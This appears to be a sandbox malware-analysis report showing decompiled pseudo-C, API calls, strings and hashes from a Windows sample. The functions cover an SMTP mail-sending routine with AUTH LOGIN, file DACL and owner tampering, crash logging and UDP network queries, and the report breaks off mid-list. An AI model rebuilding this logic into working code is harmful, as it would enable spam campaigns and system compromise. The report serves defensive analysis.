				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0040E318();
				return 1;
			}

APIs

wsprintfA.USER32 ref: 0040654D
IsBadReadPtr.KERNEL32(?,00000008), ref: 0040655C
htonl.WS2_32(?), ref: 00406578
htonl.WS2_32(?), ref: 00406587
wsprintfA.USER32 ref: 0040659B
wsprintfA.USER32 ref: 004065DC
wsprintfA.USER32 ref: 00406671
GetCurrentProcess.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040668A
StackWalk64.DBGHELP(0000014C,00000000), ref: 00406696
wsprintfA.USER32 ref: 004066B0
wsprintfA.USER32 ref: 004066E7
wsprintfA.USER32 ref: 004066FF
wsprintfA.USER32 ref: 0040671F
ExitProcess.KERNEL32 ref: 00406755

Strings

va=%08X%08X uef=%p, xrefs: 00406595
plgs:, xrefs: 004066AA
12:08:32, xrefs: 00406535
_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p, xrefs: 004065D6
localcfg, xrefs: 0040672D
ver=%d date=%s %sc=%08x a=%p, xrefs: 00406547
except_info, xrefs: 00406728
Jan 13 2018, xrefs: 0040653A
ret=%pp1=%pp2=%pp3=%pp4=%p, xrefs: 0040666B
%d=%p, xrefs: 004066F9

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
API String ID: 2400214276-165278494
Opcode ID: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
Opcode Fuzzy Hash: b90de3a98ed26af7195d6c430e21dd073139462529909c443086ffd26068662a
Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7C1, Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				signed int _t63;
				void* _t65;
				signed int _t68;
				signed int _t74;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;
				signed int _t92;
				void* _t96;
				intOrPtr _t102;
				signed int _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				signed int _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						__eflags = _t102 - 6;
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								__eflags = _t63;
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								__eflags = _t103 - 0x1f4;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								__eflags = _v132;
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									_t68 = E0040EE95( &_v1156,  &_v132);
									__eflags = _t68;
									if(_t68 != 0) {
										break;
									}
									L34:
									_t92 = 0x3f6 - _t103;
									__eflags = _t92;
									_push(0);
									_push(_t92);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								__eflags = _t103 - 3;
								if(_t103 <= 3) {
									goto L34;
								}
								E0040EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								__eflags = _v132;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							__eflags = _t123 - 7;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							__eflags = _t103 - 5;
							if(_t103 <= 5) {
								E0040EF00(_a16, "Too small respons\n");
							} else {
								E0040EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							__eflags = _t103 - 5;
							if(_t103 < 5) {
								L71:
								E0040EF00(_a16, "Incorrect respons");
								_push(7);
								goto L72;
							} else {
								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
									goto L71;
								}
								_t104 = E0040EDAC( &_v1156);
								__eflags = _t104 - 0xdc;
								if(_t104 == 0xdc) {
									L50:
									_t129 = 1;
									_t74 = E0040EE95( &_v1156, "ESMTP");
									__eflags = _t74;
									_t52 = _t74 != 0;
									__eflags = _t52;
									 *0x413668 = _t74 & 0xffffff00 | _t52;
									_t123 = 1;
									L51:
									__eflags = _t123 - 0xc;
									if(_t123 != 0xc) {
										L54:
										__eflags = _t129;
										if(_t129 != 0) {
											goto L23;
										}
										_t76 =  *0x413630; // 0x0
										__eflags = _t76;
										if(_t76 == 0) {
											L70:
											_push(0xb);
											goto L72;
										}
										__eflags =  *0x413634 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags =  *0x413638 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags = _t123 - 4;
										if(_t123 != 4) {
											L61:
											_t78 = E0040A699( &_v1156,  *0x413634);
											__eflags = _t78;
											if(_t78 == 0) {
												_t80 = E0040A699( &_v1156,  *0x413638);
												__eflags = _t80;
												if(_t80 == 0) {
													__eflags = _t123 - 3;
													if(_t123 == 3) {
														L69:
														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
														_push( &_v132);
														_t85 = E0040EE95( &_v1156, E0040A7A3(_t82, _t82));
														__eflags = _t85;
														if(_t85 != 0) {
															goto L62;
														}
														goto L70;
													}
													__eflags = _t123 - 4;
													if(_t123 == 4) {
														goto L69;
													}
													__eflags = _t123 - 5;
													if(_t123 == 5) {
														goto L69;
													}
													__eflags = _t123 - 6;
													if(_t123 != 6) {
														goto L70;
													}
													goto L69;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
											goto L72;
										}
										_t87 = E0040A699( &_v1156, _t76);
										__eflags = _t87;
										if(_t87 == 0) {
											goto L61;
										}
										_push(8);
										goto L72;
									}
									__eflags = _t104 - 0x217;
									if(_t104 != 0x217) {
										goto L54;
									}
									_push(0xf);
									goto L72;
								}
								__eflags = _t104 - 0xfa;
								if(_t104 == 0xfa) {
									goto L50;
								}
								__eflags = _t104 - 0x162;
								if(_t104 == 0x162) {
									goto L50;
								}
								__eflags = _t104 - 0xdd;
								if(_t104 == 0xdd) {
									goto L50;
								}
								__eflags = _t104 - 0x14e;
								if(_t104 == 0x14e) {
									goto L50;
								}
								__eflags = _t104 - 0xeb;
								if(_t104 == 0xeb) {
									goto L50;
								}
								_t129 = 0;
								goto L51;
							}
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						__eflags = _t96 - _t124;
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x413668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0040EE08();
						goto L20;
					case 9:
						__eax = _a12;
						_t9 = __eax + 1; // 0x1
						__edx = _t9;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						_t15 = __eax + 1; // 0x1
						__edx = _t15;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}

0x0040a7cb
0x0040a7cf
0x0040a7cf
0x0040a7d3
0x0040a7d9
0x0040a87d
0x0040a87e
0x0040a886
0x0040a88d
0x0040a893
0x0040a897
0x0040a8bf
0x0040a8c2
0x0040a8f2
0x0040a8f2
0x0040a8f8
0x0040a8fa
0x0040a900
0x0040a906
0x0040a909
0x0040a90a
0x0040a978
0x0040a97c
0x0040a97e
0x0040a980
0x00000000
0x00000000
0x0040a912
0x0040a914
0x0040a91a
0x0040a9b9
0x0040a9c2
0x0040ab4a
0x0040ab4a
0x00000000
0x0040ab4a
0x0040a920
0x0040a924
0x0040a92c
0x0040a954
0x0040a95f
0x0040a966
0x0040a968
0x00000000
0x00000000
0x0040a96a
0x0040a96c
0x0040a96c
0x0040a96e
0x0040a970
0x0040a971
0x00000000
0x0040a971
0x0040a92e
0x0040a931
0x00000000
0x00000000
0x0040a940
0x0040a945
0x0040a948
0x0040a94c
0x0040a952
0x00000000
0x00000000
0x00000000
0x0040a952
0x0040a982
0x0040a985
0x0040a988
0x0040a89e
0x0040a89e
0x00000000
0x0040a89e
0x0040a98e
0x0040a991
0x0040a9d1
0x0040a993
0x0040a99f
0x0040a9a7
0x0040a9aa
0x0040a9aa
0x0040a9d8
0x0040a9db
0x0040ab39
0x0040ab41
0x0040ab48
0x00000000
0x0040a9e1
0x0040a9e1
0x0040a9e9
0x00000000
0x00000000
0x0040a9fb
0x0040a9fe
0x0040aa04
0x0040aa32
0x0040aa40
0x0040aa41
0x0040aa46
0x0040aa49
0x0040aa49
0x0040aa4d
0x0040aa52
0x0040aa54
0x0040aa54
0x0040aa57
0x0040aa68
0x0040aa68
0x0040aa6a
0x00000000
0x00000000
0x0040aa70
0x0040aa75
0x0040aa77
0x0040ab35
0x0040ab35
0x00000000
0x0040ab35
0x0040aa7d
0x0040aa83
0x00000000
0x00000000
0x0040aa89
0x0040aa8f
0x00000000
0x00000000
0x0040aa95
0x0040aa98
0x0040aab4
0x0040aac1
0x0040aac8
0x0040aaca
0x0040aadd
0x0040aae4
0x0040aae6
0x0040aaec
0x0040aaef
0x0040ab00
0x0040ab12
0x0040ab1a
0x0040ab29
0x0040ab31
0x0040ab33
0x00000000
0x00000000
0x00000000
0x0040ab33
0x0040aaf1
0x0040aaf4
0x00000000
0x00000000
0x0040aaf6
0x0040aaf9
0x00000000
0x00000000
0x0040aafb
0x0040aafe
0x00000000
0x00000000
0x00000000
0x0040aafe
0x0040aae8
0x00000000
0x0040aae8
0x0040aacc
0x0040aacc
0x00000000
0x0040aacc
0x0040aaa2
0x0040aaa9
0x0040aaab
0x00000000
0x00000000
0x0040aaad
0x00000000
0x0040aaad
0x0040aa59
0x0040aa5f
0x00000000
0x00000000
0x0040aa61
0x00000000
0x0040aa61
0x0040aa06
0x0040aa0c
0x00000000
0x00000000
0x0040aa0e
0x0040aa14
0x00000000
0x00000000
0x0040aa16
0x0040aa1c
0x00000000
0x00000000
0x0040aa1e
0x0040aa24
0x00000000
0x00000000
0x0040aa26
0x0040aa2c
0x00000000
0x00000000
0x0040aa2e
0x00000000
0x0040aa2e
0x0040a9db
0x0040a8c8
0x0040a8d2
0x0040a8d4
0x0040a8d6
0x00000000
0x00000000
0x0040a8e2
0x00000000
0x0040a8eb
0x0040a89c
0x0040a8af
0x0040a8b8
0x00000000
0x0040a8b8
0x00000000
0x0040a89c
0x0040a7df
0x00000000
0x00000000
0x00000000
0x0040a7ed
0x0040a7f0
0x0040a7f3
0x0040a803
0x0040a7f5
0x0040a7f5
0x0040a7f5
0x00000000
0x00000000
0x0040a845
0x0040a848
0x00000000
0x00000000
0x0040a852
0x0040a855
0x0040a84d
0x0040a84d
0x0040a7fa
0x0040a7fb
0x00000000
0x00000000
0x0040a85c
0x0040a85e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a86a
0x0040a86c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a80a
0x0040a80c
0x0040a871
0x0040a871
0x0040a874
0x0040a875
0x00000000
0x00000000
0x0040a813
0x0040a816
0x0040a816
0x0040a819
0x0040a819
0x0040a81b
0x0040a81c
0x0040a81c
0x00000000
0x00000000
0x0040a836
0x0040a839
0x0040a839
0x0040a83c
0x0040a83c
0x0040a83e
0x0040a83f
0x0040a83f
0x0040a820
0x0040a824
0x0040a82f
0x0040a87a
0x0040a87a
0x00000000
0x00000000

APIs

wsprintfA.USER32 ref: 0040A7FB
lstrlenA.KERNEL32(?,00000000,00000000,00000001), ref: 0040A87E
send.WS2_32(00000000,?,00000000,00000000), ref: 0040A893
wsprintfA.USER32 ref: 0040A8AF
send.WS2_32(00000000,.,00000005,00000000), ref: 0040A8D2
wsprintfA.USER32 ref: 0040A8E2
recv.WS2_32(00000000,?,000003F6,00000000), ref: 0040A97C
wsprintfA.USER32 ref: 0040A9B9

Strings

data, xrefs: 0040A85E
Error sending command (sent = %d/%d), xrefs: 0040A8A7, 0040A8DA
quit, xrefs: 0040A86C
rcpt to:<%s>, xrefs: 0040A855
., xrefs: 0040A8CA
AUTH LOGIN, xrefs: 0040A80C
ehlo %s, xrefs: 0040A7F5
mail from:<%s>, xrefs: 0040A848
Too small respons, xrefs: 0040A9C9
ESMTP, xrefs: 0040AA38
localcfg, xrefs: 0040AB0B
Too big smtp respons (%d bytes), xrefs: 0040A9B1
Incorrect respons, xrefs: 0040AB39
helo %s, xrefs: 0040A803

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wsprintf$send$lstrlenrecv
String ID: .$AUTH LOGIN$ESMTP$Error sending command (sent = %d/%d)$Incorrect respons$Too big smtp respons (%d bytes)$Too small respons$data$ehlo %s$helo %s$localcfg$mail from:<%s>$quit$rcpt to:<%s>
API String ID: 3650048968-2394369944
Opcode ID: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
Instruction ID: cb8b6fe7cbcb8804cc0a5996a8d7cccc3c4edaa2c523fe44b9a5a0cb3107b5a3
Opcode Fuzzy Hash: ab93601b3fbd501b452cd95e20af3b55248dc9460a2857cfbe0e165fe481e7b1
Instruction Fuzzy Hash: 34A16872A44305AADF209A54DC85FEF3B79AB00304F244437FA05B61D0DA7D9DA98B5F

Uniqueness

Uniqueness Score: -1.00%

Function 00407809, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226
memoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				struct _ACL* _t110;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				if(GetUserNameA( &_v384,  &_v36) == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
					goto L42;
				} else {
					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
						_v36 = 0x80;
						_v40 = 0x80;
						if(EqualSid( &_v128, _v16) == 0) {
							_v28 = 1;
							_t155 = LocalAlloc(0x40, 0x14);
							if(_t155 != 0) {
								LocalFree(_t155);
							}
						}
					}
					_v24 = _t141;
					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
						L41:
						goto L42;
					}
					_t110 = _v20;
					if(_t110 == _t141) {
						goto L41;
					}
					_v8 = _v8 & _t141;
					if(0 >= _t110->AceCount) {
						goto L41;
					} else {
						goto L13;
					}
					do {
						L13:
						if(GetAce(_t110, _v8,  &_v12) == 0) {
							L32:
							_v8 = _v8 + 1;
							goto L33;
						}
						_t153 = 0;
						_v16 = _v12 + 8;
						if(_t141 <= 0) {
							L19:
							if(_t141 < 0x20) {
								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
								_t141 = _t141 + 1;
							}
							_t120 = EqualSid( &_v128, _v16);
							_t146 = _v12;
							if(_t120 == 0) {
								_t121 = 0x1200a8;
							} else {
								asm("sbb eax, eax");
								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
							}
							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
								 *((intOrPtr*)(_t146 + 4)) = _t121;
								_t146 = _v12;
								_v24 = 1;
							}
							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
								 *_t146 = 0;
								_t66 = _v16 + 8; // 0xc8685f74
								_t123 =  *_t66;
								if(_t123 != 0) {
									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
								} else {
									 *((char*)(_v12 + 1)) = 0xb;
								}
								_v24 = 1;
							}
							goto L32;
						}
						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
							_t153 = _t153 + 1;
							if(_t153 < _t141) {
								continue;
							}
							break;
						}
						if(_t153 >= _t141) {
							goto L19;
						}
						DeleteAce(_v20, _v8);
						_v24 = 1;
						L33:
						_t110 = _v20;
					} while (_v8 < (_t110->AceCount & 0x0000ffff));
					if(_v24 != 0) {
						_v28 = 1;
						_t154 = LocalAlloc(0x40, 0x14);
						if(_t154 != 0) {
							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
								_v28 = 1;
							}
							LocalFree(_t154);
						}
					}
					goto L41;
				}
			}

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0040782F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
GetLengthSid.ADVAPI32(?), ref: 00407878
GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
LocalFree.KERNEL32(00000000), ref: 00407917
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
GetAce.ADVAPI32(?,00000000,?), ref: 00407963
EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
LocalFree.KERNEL32(00000000), ref: 00407A87

Strings

D, xrefs: 0040785C

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
String ID: D
API String ID: 3722657555-2746444292
Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69

Uniqueness

Uniqueness Score: -1.00%

Function 02167A59, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 02167A7F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02167AB6
GetLengthSid.ADVAPI32(?), ref: 02167AC8
GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 02167AEA
GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 02167B08
EqualSid.ADVAPI32(?,?), ref: 02167B22
LocalAlloc.KERNEL32(00000040,00000014), ref: 02167B33
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02167B41
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02167B51
SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02167B60
LocalFree.KERNEL32(00000000), ref: 02167B67
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02167B83
GetAce.ADVAPI32(?,?,?), ref: 02167BB3
EqualSid.ADVAPI32(?,?), ref: 02167BDA
DeleteAce.ADVAPI32(?,?), ref: 02167BF3
EqualSid.ADVAPI32(?,?), ref: 02167C15
LocalAlloc.KERNEL32(00000040,00000014), ref: 02167C9A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02167CA8
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02167CB9
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02167CC9
LocalFree.KERNEL32(00000000), ref: 02167CD7

Strings

D, xrefs: 02167AAC

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
String ID: D
API String ID: 3722657555-2746444292
Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction ID: 956b8a9f7e1025afc6a6e967d62489a17368a653d494bdf8bdaac177a4ec35f0
Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction Fuzzy Hash: D4815D72D4021EABDB21CFA4DD48FFEBBB9EF08348F14806AE505E6190D7358652CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00402A62, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 194
networkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00402A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00402923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00402904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0040EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}

APIs

GetProcessHeap.KERNEL32(00000000,00001000,00000000,?,73B74F20), ref: 00402A83
HeapAlloc.KERNEL32(00000000,?,73B74F20), ref: 00402A86
socket.WS2_32(00000002,00000002,00000011), ref: 00402AA0
